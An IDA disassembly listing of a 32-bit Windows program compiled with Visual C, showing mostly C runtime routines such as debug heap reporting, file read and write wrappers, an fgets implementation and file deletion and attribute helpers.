mov ecx, dword ptr [ebp+var_20]
mov edx, [ecx+14h]
and edx, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+edx*4+4], eax
mov edx, dword ptr [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4+18h]
mov eax, dword ptr [ebp+var_20]
add edx, [eax+10h]
mov ecx, dword ptr [ebp+var_20]
mov eax, [ecx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+eax*4+18h], edx
jmp short loc_41E8AD
; ---------------------------------------------------------------------------
loc_41E888: ; CODE XREF: sub_41E750+D0�j
; sub_41E750+E1�j ...
mov edx, dword ptr [ebp+var_20]
push edx ; char
push offset aBadMemoryBlock ; "Bad memory block found at 0x%08X.\n"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41E8A7
int 3 ; Trap to Debugger
loc_41E8A7: ; CODE XREF: sub_41E750+154�j
xor eax, eax
test eax, eax
jnz short loc_41E888
loc_41E8AD: ; CODE XREF: sub_41E750+136�j
jmp loc_41E801
; ---------------------------------------------------------------------------
loc_41E8B2: ; CODE XREF: sub_41E750+BD�j
mov ecx, [ebp+arg_0]
mov edx, dword_4F4770
mov [ecx+2Ch], edx
mov eax, [ebp+arg_0]
mov ecx, dword_4F4764
mov [eax+30h], ecx
mov [ebp+var_4], 0FFFFFFFFh
call sub_41E8D8
jmp short loc_41E8E3
sub_41E750 endp
; =============== S U B R O U T I N E =======================================
sub_41E8D8 proc near ; CODE XREF: sub_41E750+181�p
; DATA XREF: .rdata:0043DB38�o
push 9
call __unlock
add esp, 4
retn
sub_41E8D8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E750
loc_41E8E3: ; CODE XREF: sub_41E750+4F�j
; sub_41E750+186�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41E750
; ---------------------------------------------------------------------------
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION __CrtMemDifference. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002B1 BYTES: COLLAPSED FUNCTION __CrtMemDumpAllObjectsSince. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41ECE1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000037 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtMemDumpAllObjectsSince. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000114 BYTES: COLLAPSED FUNCTION __printMemBlockData. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000074 BYTES: COLLAPSED FUNCTION __CrtDumpMemoryLeaks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C5 BYTES: COLLAPSED FUNCTION __CrtMemDumpStatistics. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41EFA0(void *DstBuf,size_t ElementSize,size_t Count,FILE *File)
sub_41EFA0 proc near ; CODE XREF: sub_4010AB+45�p
; sub_40FAEE+4E�p ...
var_4 = dword ptr -4
DstBuf = dword ptr 8
ElementSize = dword ptr 0Ch
Count = dword ptr 10h
File = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+File]
push eax
call __lock_file
add esp, 4
mov ecx, [ebp+File]
push ecx ; File
mov edx, [ebp+Count]
push edx ; Count
mov eax, [ebp+ElementSize]
push eax ; ElementSize
mov ecx, [ebp+DstBuf]
push ecx ; DstBuf
call _fread
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+File]
push edx
call __unlock_file
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41EFA0 endp
; ---------------------------------------------------------------------------
align 10h
; [000001CF BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FC BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FF BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000011 BYTES: COLLAPSED FUNCTION _atoi. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000129 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000013 BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000013 BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E3 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __lockexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __unlockexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000025 BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FA BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION _srand. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000242 BYTES: COLLAPSED FUNCTION __splitpath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDD0 proc near ; CODE XREF: sub_401CC7+76DF�p
; sub_401CC7+770E�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_10], ecx
loc_41FDE5: ; CODE XREF: sub_41FDD0+3D�j
cmp [ebp+arg_0], 0
jnz short loc_41FE09
push offset aStringNull ; "string != NULL"
push 0 ; int
push 3Bh ; Value
push offset aFgets_c ; "fgets.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41FE09
int 3 ; Trap to Debugger
loc_41FE09: ; CODE XREF: sub_41FDD0+19�j
; sub_41FDD0+36�j
xor edx, edx
test edx, edx
jnz short loc_41FDE5
loc_41FE0F: ; CODE XREF: sub_41FDD0+67�j
cmp [ebp+arg_8], 0
jnz short loc_41FE33
push offset aStrNull ; "str != NULL"
push 0 ; int
push 3Ch ; Value
push offset aFgets_c ; "fgets.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41FE33
int 3 ; Trap to Debugger
loc_41FE33: ; CODE XREF: sub_41FDD0+43�j
; sub_41FDD0+60�j
xor eax, eax
test eax, eax
jnz short loc_41FE0F
cmp [ebp+arg_4], 0
jg short loc_41FE46
xor eax, eax
jmp loc_41FF07
; ---------------------------------------------------------------------------
loc_41FE46: ; CODE XREF: sub_41FDD0+6D�j
mov ecx, [ebp+arg_8]
mov [ebp+File], ecx
mov edx, [ebp+File]
push edx
call __lock_file
add esp, 4
loc_41FE58: ; CODE XREF: sub_41FDD0:loc_41FEED�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
cmp [ebp+arg_4], 0
jz loc_41FEF2
mov ecx, [ebp+File]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+File]
mov [eax+4], edx
mov ecx, [ebp+File]
cmp dword ptr [ecx+4], 0
jl short loc_41FEA3
mov edx, [ebp+File]
mov eax, [edx]
movsx ecx, byte ptr [eax]
and ecx, 0FFh
mov [ebp+var_14], ecx
mov edx, [ebp+File]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+File]
mov [ecx], eax
jmp short loc_41FEB2
; ---------------------------------------------------------------------------
loc_41FEA3: ; CODE XREF: sub_41FDD0+B1�j
mov edx, [ebp+File]
push edx ; File
call __filbuf
add esp, 4
mov [ebp+var_14], eax
loc_41FEB2: ; CODE XREF: sub_41FDD0+D1�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_41FED1
mov ecx, [ebp+var_8]
cmp ecx, [ebp+arg_0]
jnz short loc_41FECF
mov [ebp+var_10], 0
jmp short loc_41FEF8
; ---------------------------------------------------------------------------
loc_41FECF: ; CODE XREF: sub_41FDD0+F4�j
jmp short loc_41FEF2
; ---------------------------------------------------------------------------
loc_41FED1: ; CODE XREF: sub_41FDD0+EC�j
mov edx, [ebp+var_8]
mov al, byte ptr [ebp+var_C]
mov [edx], al
movsx ecx, byte ptr [ebp+var_C]
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
cmp ecx, 0Ah
jnz short loc_41FEED
jmp short loc_41FEF2
; ---------------------------------------------------------------------------
loc_41FEED: ; CODE XREF: sub_41FDD0+119�j
jmp loc_41FE58
; ---------------------------------------------------------------------------
loc_41FEF2: ; CODE XREF: sub_41FDD0+95�j
; sub_41FDD0:loc_41FECF�j ...
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
loc_41FEF8: ; CODE XREF: sub_41FDD0+FD�j
mov ecx, [ebp+File]
push ecx
call __unlock_file
add esp, 4
mov eax, [ebp+var_10]
loc_41FF07: ; CODE XREF: sub_41FDD0+71�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41FDD0 endp
; ---------------------------------------------------------------------------
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION _strtol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000331 BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION _strtoul. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420290 proc near ; CODE XREF: sub_401CC7+5ADD�p
; .text:004202E7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F6388 ; DeleteFileA
test eax, eax
jnz short loc_4202AD
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov [ebp+var_4], eax
jmp short loc_4202B4
; ---------------------------------------------------------------------------
loc_4202AD: ; CODE XREF: sub_420290+10�j
mov [ebp+var_4], 0
loc_4202B4: ; CODE XREF: sub_420290+1B�j
cmp [ebp+var_4], 0
jz short loc_4202CB
mov ecx, [ebp+var_4]
push ecx
call __dosmaperr
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_4202CD
; ---------------------------------------------------------------------------
loc_4202CB: ; CODE XREF: sub_420290+28�j
xor eax, eax
loc_4202CD: ; CODE XREF: sub_420290+39�j
mov esp, ebp
pop ebp
retn
sub_420290 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call sub_420290
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000C1 BYTES: COLLAPSED FUNCTION _fprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000145 BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000F3 BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION _strncat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000135 BYTES: COLLAPSED FUNCTION _floor. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED FUNCTION __initp_misc_winxfltr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_4F47BC
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4F47BC, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; [00000027 BYTES: COLLAPSED FUNCTION __ftol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000135 BYTES: COLLAPSED FUNCTION _ceil. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION _JumpToContinuation(void *,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION sub_4211B0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION sub_4211C0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION sub_4211D0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000056 BYTES: COLLAPSED FUNCTION _UnwindNestedFrames(EHRegistrationNode *,EHExceptionRecord *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION ___CxxFrameHandler3. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000026 BYTES: COLLAPSED FUNCTION __CxxLongjmpUnwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION _CallCatchBlock2(EHRegistrationNode *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000CC BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000081 BYTES: COLLAPSED FUNCTION TranslatorGuardHandler(EHExceptionRecord *,TranslatorGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __NLG_Notify1. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __EH_prolog. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A1 BYTES: COLLAPSED FUNCTION operator delete(void *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001C BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B3 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004D BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000181 BYTES: COLLAPSED FUNCTION _time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D0 BYTES: COLLAPSED FUNCTION __strcmpi. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000127 BYTES: COLLAPSED FUNCTION __fseek_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421FE0(void *Str,size_t Size,size_t Count,FILE *File)
sub_421FE0 proc near ; CODE XREF: sub_416D5D+127�p
; .text:0041C355�p ...
var_4 = dword ptr -4
Str = dword ptr 8
Size = dword ptr 0Ch
Count = dword ptr 10h
File = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+File]
push eax
call __lock_file
add esp, 4
mov ecx, [ebp+File]
push ecx ; File
mov edx, [ebp+Count]
push edx ; Count
mov eax, [ebp+Size]
push eax ; Size
mov ecx, [ebp+Str]
push ecx ; Str
call _fwrite
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+File]
push edx
call __unlock_file
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_421FE0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000219 BYTES: COLLAPSED FUNCTION _fwrite. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422240 proc near ; CODE XREF: sub_4174A9+8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F63A0 ; GetFileAttributesA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_42226B
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
call __dosmaperr
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_42229C
; ---------------------------------------------------------------------------
loc_42226B: ; CODE XREF: sub_422240+15�j
mov ecx, [ebp+var_4]
and ecx, 1
test ecx, ecx
jz short loc_42229A
mov edx, [ebp+arg_4]
and edx, 2
test edx, edx
jz short loc_42229A
call __errno
mov dword ptr [eax], 0Dh
call ___doserrno
mov dword ptr [eax], 5
or eax, 0FFFFFFFFh
jmp short loc_42229C
; ---------------------------------------------------------------------------
loc_42229A: ; CODE XREF: sub_422240+33�j
; sub_422240+3D�j
xor eax, eax
loc_42229C: ; CODE XREF: sub_422240+29�j
; sub_422240+58�j
mov esp, ebp
pop ebp
retn
sub_422240 endp
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001BF BYTES: COLLAPSED FUNCTION __strupr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isalpha. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _isupper. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _islower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _isdigit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isxdigit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _ispunct. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isalnum. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isprint. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isgraph. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _iscntrl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION ___isascii. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION ___toascii. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION ___iscsymf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION ___iscsym. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000B BYTES: COLLAPSED FUNCTION __tolower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000093 BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000012B BYTES: COLLAPSED FUNCTION _tolower_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000030 BYTES: COLLAPSED FUNCTION _wcslen. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION _mbstowcs. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001EB BYTES: COLLAPSED FUNCTION __mbstowcs_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000132 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423052 proc near ; DATA XREF: .rdata:0043DDE4�o
mov ecx, [ebp-14h]
mov edx, [ecx]
mov eax, [edx]
mov [ebp-68h], eax
mov ecx, [ebp-14h]
push ecx
mov edx, [ebp-68h]
push edx
call __XcptFilter
add esp, 8
retn
sub_423052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_42306D proc near ; DATA XREF: .rdata:0043DDE8�o
mov esp, [ebp-18h]
mov eax, [ebp-68h]
push eax ; Code
call __exit
sub_42306D endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000028 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002A BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000012C BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001A BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __lock_file. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __lock_file2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __unlock_file. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __unlock_file2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423320 proc near ; CODE XREF: __CrtDbgReport+113�p
; _CrtMessageWindow+33�p
push ebp
mov ebp, esp
call ds:dword_4F64CC ; DebugBreak
pop ebp
retn
sub_423320 endp
; ---------------------------------------------------------------------------
align 10h
; [00000057 BYTES: COLLAPSED FUNCTION __CrtSetReportMode. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007E BYTES: COLLAPSED FUNCTION __CrtSetReportFile. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_4F4E90
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4F4E90, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000390 BYTES: COLLAPSED FUNCTION __CrtDbgReport. PRESS KEYPAD "+" TO EXPAND]
; [0000030C BYTES: COLLAPSED FUNCTION _CrtMessageWindow. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007A BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __close_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000092 BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000044 BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION __fflush_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __flushall. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013F BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000030 BYTES: COLLAPSED FUNCTION _set_new_handler(int (*)(uint)). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, dword_4F47F8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000037 BYTES: COLLAPSED FUNCTION __mtinitlocks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009F BYTES: COLLAPSED FUNCTION __mtdeletelocks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000097 BYTES: COLLAPSED FUNCTION __lock. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION __unlock. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001C BYTES: COLLAPSED FUNCTION __lockerr_exit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_4: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __malloc_base. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION __nh_malloc_base. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000065 BYTES: COLLAPSED FUNCTION __heap_alloc_base. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_424345. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
